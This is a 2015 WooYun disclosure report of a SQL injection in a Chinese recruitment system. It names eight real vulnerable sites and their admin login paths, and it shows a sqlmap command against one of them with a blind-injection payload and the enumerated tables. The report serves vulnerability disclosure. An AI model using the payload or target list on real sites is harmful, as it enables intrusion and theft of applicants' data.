漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-096286
漏洞标题:某人才系统一处sql注入
相关厂商:cncert
漏洞作者: 路人甲
提交时间:2015-02-13 11:59
修复时间:2015-05-18 08:24
公开时间:2015-05-18 08:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-13: 细节已通知厂商并且等待厂商处理中
2015-02-17: 厂商已经确认,细节仅向厂商公开
2015-02-20: 细节向第三方安全合作伙伴开放
2015-04-13: 细节向核心白帽子及相关领域专家公开
2015-04-23: 细节向普通白帽子公开
2015-05-03: 细节向实习白帽子公开
2015-05-18: 细节向公众公开
简要描述:
某人才系统一处sql注入
详细说明:
根据 WooYun: 某人才招聘管理系统存在两处sql注入
注入点wtjob.asp?id=
有防注入系统也无视
案例
http://www.yczjw.cn/wtjob.asp?id=21
http://job0514.com/wtjob.asp?id=21
http://www.dtrsrc.com/wtjob.asp?id=21
http://www.tfjyfw.com/wtjob.asp?id=229
http://www.mmhu.cn/wtjob.asp?id=30
http://112.124.28.12/wtjob.asp?id=21
http://www.mdjmg.com/wtjob.asp?id=21
http://www.dykr.com/wtjob.asp?id=3090
挑其中几个后台地址证明一下属于同一套系统
http://www.yczjw.cn/admin/login.asp
http://job0514.com/admin/login.asp
http://www.dtrsrc.com/admin/login.asp
http://www.tfjyfw.com/admin/login.asp
http://www.mmhu.cn/admin/login.asp
测试案例
sqlmap.py -u "http://www.dykr.com/wtjob.asp?id=3090" --tables
sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3090 AND 8929=8929
---
[18:36:28] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
do you want to use common table existence check? [Y/n/q] y
[18:36:31] [INFO] checking table existence using items from 'C:\Python27\sqlmap\
txt\common-tables.txt'
[18:36:31] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[18:36:34] [INFO] starting 10 threads
[18:36:35] [INFO] retrieved: person
[18:36:38] [INFO] retrieved: admin
[18:36:52] [INFO] retrieved: company
[18:36:54] [INFO] retrieved: system
[18:37:09] [INFO] retrieved: ads
[18:37:15] [INFO] retrieved: job
[18:37:24] [INFO] retrieved: vote
[18:41:18] [INFO] retrieved: ad
Database: Microsoft_Access_masterdb
[8 tables]
+---------+
| ad |
| admin |
| ads |
| company |
| job |
| person |
| system |
| vote |
+---------+
漏洞证明:
案例
http://www.yczjw.cn/wtjob.asp?id=21
http://job0514.com/wtjob.asp?id=21
http://www.dtrsrc.com/wtjob.asp?id=21
http://www.tfjyfw.com/wtjob.asp?id=229
http://www.mmhu.cn/wtjob.asp?id=30
http://112.124.28.12/wtjob.asp?id=21
http://www.mdjmg.com/wtjob.asp?id=21
http://www.dykr.com/wtjob.asp?id=3090
挑其中几个后台地址证明一下属于同一套系统
http://www.yczjw.cn/admin/login.asp
http://job0514.com/admin/login.asp
http://www.dtrsrc.com/admin/login.asp
http://www.tfjyfw.com/admin/login.asp
http://www.mmhu.cn/admin/login.asp
测试案例
sqlmap.py -u "http://www.dykr.com/wtjob.asp?id=3090" --tables
sqlmap identified the following injection points with a total of 33 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3090 AND 8929=8929
---
[18:36:28] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
do you want to use common table existence check? [Y/n/q] y
[18:36:31] [INFO] checking table existence using items from 'C:\Python27\sqlmap\
txt\common-tables.txt'
[18:36:31] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[18:36:34] [INFO] starting 10 threads
[18:36:35] [INFO] retrieved: person
[18:36:38] [INFO] retrieved: admin
[18:36:52] [INFO] retrieved: company
[18:36:54] [INFO] retrieved: system
[18:37:09] [INFO] retrieved: ads
[18:37:15] [INFO] retrieved: job
[18:37:24] [INFO] retrieved: vote
[18:41:18] [INFO] retrieved: ad
Database: Microsoft_Access_masterdb
[8 tables]
+---------+
| ad |
| admin |
| ads |
| company |
| job |
| person |
| system |
| vote |
+---------+
修复方案:
过滤,过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:16
确认时间:2015-02-17 08:22
厂商回复:
最新状态:
暂无